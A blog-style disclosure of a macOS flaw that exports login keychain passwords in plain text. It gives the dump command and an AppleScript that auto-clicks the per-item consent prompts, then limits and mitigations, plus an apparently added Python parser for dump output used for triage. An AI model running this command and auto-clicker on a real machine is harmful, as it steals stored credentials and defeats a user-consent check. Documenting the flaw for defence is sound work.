Security Flaw in OS X displays all keychain passwords in plain text

Brenton Henry
Jul 7, 2016 · 3 min read

This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.

There is a built-in command on OS X that lets anyone with access to an unlocked user session export that user's login keychain to a text file, with every username and password in plain text. It needs no sudo. It does raise a confirmation dialog for each item, but those dialogs can be clicked through automatically by a short script, so in practice the user never sees one. As of this writing the method works on at least 10.10 and 10.11.5, and presumably on every release in between.

The method consists of opening Terminal and pasting the following command, which writes the contents of the login keychain, secrets included, to keychain.txt in the current directory:

security dump-keychain -d login.keychain > keychain.txt

The command triggers an Allow/Deny prompt from SecurityAgent for every item in the keychain. You can click through all of them without touching the mouse by starting the dump in the background and, while it runs, running the following AppleScript (for example through osascript), which presses Allow on each prompt for as long as a SecurityAgent process exists:

-- keep pressing Allow on each keychain prompt until SecurityAgent is gone
tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

Any unauthorized user, whether through a remote session like the one my friend granted or someone you've let borrow your computer for only a few seconds, can walk away with every username and password you've ever stored in Keychain, including whatever iCloud credentials it holds.

Two details matter when assessing the exposure. The dump only succeeds while the login keychain is unlocked; by default it stays unlocked for the whole session, so anyone in front of an unlocked machine qualifies, but a login keychain configured (in Keychain Access, or with the security CLI's set-keychain-settings) to lock on sleep and after a period of inactivity makes the command ask for the keychain password instead, which the auto-clicker cannot supply. And the AppleScript only works if the process running it (Terminal, or whatever launched osascript) has been allowed under System Preferences > Security & Privacy > Privacy > Accessibility, which takes an administrator password to change; without that, the per-item prompts still appear and have to be clicked by hand, which is noisier but no harder for someone who is already sitting at the keyboard.
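To see what a dump like this actually hands over, or to triage one after an incident such as the one above, here is a small parser for the record layout that security dump-keychain -d writes (keychain, class, attributes and data blocks, one group per item). This is an added example, not code from the original post or from Apple. The sample text inside it is constructed to mirror that layout for one generic password and one internet password and is not a real dump, and the numeric tag 0x00000007 is mapped to "label" on the assumption that it is the item's label attribute.

```python
"""Parse the text written by `security dump-keychain -d` and list what it exposed.

Added example for this post (not the article's own code). SAMPLE_DUMP below is a
constructed imitation of the dump layout, not output captured from a real machine.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: one generic password ("genp") and one internet password
# ("inet"), in the record layout the dump uses. Raw string so "\303" stays literal.
SAMPLE_DUMP = r'''keychain: "/Users/alice/Library/Keychains/login.keychain"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="Example VPN"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="alice"
    "desc"<blob>=<NULL>
    "svce"<blob>="Example VPN"
data:
"hunter2"

keychain: "/Users/alice/Library/Keychains/login.keychain"
version: 512
class: "inet"
attributes:
    0x00000007 <blob>="mail.example.com"
    "acct"<blob>="alice@example.com"
    "ptcl"<uint32>="imap"
    "srvr"<blob>="mail.example.com"
data:
0x70c3a4737377307264  "p\303\244ssw0rd"
'''

# An attribute line is either  "name"<type>=value  or  0xNNNNNNNN <type>=value.
ATTR_RE = re.compile(
    r'^\s*(?:"(?P<name>\w+)"|(?P<tag>0x[0-9a-fA-F]{8}))\s*<\w+>=(?P<val>.*)$'
)
# Assumption: the dump shows the item label by numeric tag 7 rather than by name.
NUMERIC_TAGS = {"0x00000007": "label"}


@dataclass
class KeychainItem:
    keychain: str
    klass: str = ""                                   # "genp", "inet", ...
    attrs: Dict[str, str] = field(default_factory=dict)
    secret: Optional[str] = None                      # the plain-text password


def _parse_value(raw: str) -> Optional[str]:
    """Decode one dumped value: <NULL>, a quoted string, or hex followed by an escaped string."""
    raw = raw.strip()
    if raw == "<NULL>":
        return None
    hex_form = re.match(r'^0x([0-9a-fA-F]+)\s+"', raw)
    if hex_form:  # non-printable data is shown as hex plus an escaped rendering
        return bytes.fromhex(hex_form.group(1)).decode("utf-8", "replace").rstrip("\x00")
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    return raw


def parse_dump(text: str) -> List[KeychainItem]:
    """Split the dump into items; each item starts at a 'keychain:' line."""
    items: List[KeychainItem] = []
    item: Optional[KeychainItem] = None
    expect_secret = False  # True right after a 'data:' line
    for line in text.splitlines():
        if line.startswith("keychain:"):
            item = KeychainItem(keychain=_parse_value(line.split(":", 1)[1]) or "")
            items.append(item)
            expect_secret = False
            continue
        if item is None:
            continue
        if expect_secret:
            if line.strip():  # the value follows 'data:' on its own line
                item.secret = _parse_value(line)
                expect_secret = False
            continue
        if line.startswith("class:"):
            item.klass = _parse_value(line.split(":", 1)[1]) or ""
        elif line.startswith("data:"):
            expect_secret = True
        else:
            m = ATTR_RE.match(line)
            if m:
                name = m.group("name") or NUMERIC_TAGS.get(m.group("tag"), m.group("tag"))
                val = _parse_value(m.group("val"))
                if val is not None:  # drop <NULL> attributes
                    item.attrs[name] = val
    return items


def summarize(items: List[KeychainItem]) -> List[Tuple[str, str, Optional[str], Optional[str]]]:
    """One row per item: class, where the credential is used, account, secret."""
    rows = []
    for it in items:
        where = it.attrs.get("srvr") or it.attrs.get("svce") or it.attrs.get("label") or "?"
        rows.append((it.klass, where, it.attrs.get("acct"), it.secret))
    return rows


if __name__ == "__main__":
    for klass, where, acct, secret in summarize(parse_dump(SAMPLE_DUMP)):
        print(f"{klass:5} {where:20} {acct or '-':22} {secret!r}")
```

Run against a real keychain.txt the summary is the list of accounts whose passwords must be rotated; the hex branch matters because any password containing a non-ASCII character is printed that way rather than as a plain quoted string.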

Apple prides itself on security, but apparently this has been a known method for at least two years…
